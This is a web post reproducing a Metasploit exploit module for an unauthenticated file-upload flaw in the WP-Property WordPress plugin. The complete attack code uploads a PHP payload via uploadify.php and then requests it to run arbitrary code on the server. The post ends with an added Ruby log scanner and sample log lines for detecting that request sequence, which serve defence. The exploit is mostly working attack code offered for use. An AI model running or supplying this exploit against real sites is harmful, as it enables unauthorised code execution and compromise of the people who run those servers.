
WordPress WP-Property PHP File Upload Vulnerability

Posted on 2013-1-4 19:51:30
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
      'Description'    => %q{
          This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
        plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82656' ],
          [ 'BID', '53787' ],
          [ 'EDB', '18987'],
          [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  def check
    uri =  target_uri.path
    uri << '/' if uri[-1,1] != '/'

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
    })

    if not res or res.code != 200
      return Exploit::CheckCode::Unknown
    end

    return Exploit::CheckCode::Appears
  end

  def exploit
    uri =  target_uri.path
    uri << '/' if uri[-1,1] != '/'

    peer = "#{rhost}:#{rport}"

    @payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
    data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{@payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    if not res or res.code != 200 or res.body !~ /#{@payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    upload_uri = res.body

    print_status("#{peer} - Executing payload #{@payload_name}")
    res = send_request_raw({
      'uri'    => upload_uri,
      'method' => 'GET'
    })
  end
end

Don't ask me what this says or how to use it. I'm talking about msf.
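
The request sequence the module above sends (a POST to uploadify.php, then a GET for the uploaded .php file) leaves a recognisable trace in web-server access logs. The following Ruby scan for that trace is an added example, not part of the original post or of Metasploit; the combined log format, the IP addresses and the file names in the sample lines are constructed assumptions.

```ruby
# Added example, not part of the original post or of Metasploit.
# Assumes "combined" access-log lines; the sample lines below are constructed.
UPLOADIFY_DIR = 'wp-content/plugins/wp-property/third-party/uploadify/'
LOG_RE = /\A(?<ip>\S+) \S+ \S+ \[[^\]]+\] "(?<method>[A-Z]+) (?<path>\S+) [^"]*" (?<status>\d{3})\b/

# Parse one log line into a hash, or nil when it is not in the expected format.
def parse_line(line)
  m = LOG_RE.match(line)
  return nil unless m
  { ip: m[:ip], method: m[:method], status: m[:status].to_i,
    path: m[:path].split('?', 2).first }
end

# Findings: each successful POST to uploadify.php (:upload) and each later GET
# by the same client for another .php file in that directory (:execute).
# The upload folder is a client-supplied form field, so :upload is the primary
# signal; :execute only covers files left in the uploadify directory itself.
def find_uploadify_abuse(lines)
  uploaders = {}
  findings = []
  lines.each_with_index do |line, idx|
    e = parse_line(line)
    next unless e && e[:path].include?(UPLOADIFY_DIR)
    file = e[:path].split(UPLOADIFY_DIR, 2).last
    if e[:method] == 'POST' && file == 'uploadify.php' && e[:status] == 200
      uploaders[e[:ip]] = true
      findings << { line: idx + 1, ip: e[:ip], kind: :upload }
    elsif e[:method] == 'GET' && file.end_with?('.php') &&
          file != 'uploadify.php' && uploaders[e[:ip]]
      findings << { line: idx + 1, ip: e[:ip], kind: :execute, file: file }
    end
  end
  findings
end

BASE = '/wordpress/' + UPLOADIFY_DIR
SAMPLE_LOG = [ # constructed sample data
  %(198.51.100.7 - - [04/Jan/2013:19:40:01 +0000] "GET #{BASE}uploadify.php HTTP/1.1" 200 0),
  %(198.51.100.7 - - [04/Jan/2013:19:40:02 +0000] "POST #{BASE}uploadify.php HTTP/1.1" 200 71),
  %(198.51.100.7 - - [04/Jan/2013:19:40:03 +0000] "GET #{BASE}qWxZa.php HTTP/1.1" 200 0),
  %(203.0.113.20 - - [04/Jan/2013:19:41:10 +0000] "GET /wordpress/index.php HTTP/1.1" 200 5120),
  %(203.0.113.20 - - [04/Jan/2013:19:41:12 +0000] "GET #{BASE}check.php HTTP/1.1" 200 1)
].freeze

find_uploadify_abuse(SAMPLE_LOG).each { |f| puts f.inspect } if __FILE__ == $PROGRAM_NAME
```

Any `:upload` finding on a site that does not expect unauthenticated uploads through this plugin warrants checking the plugin version against the affected range (WP-Property <= 1.35.0) and inspecting the upload directory for unexpected files.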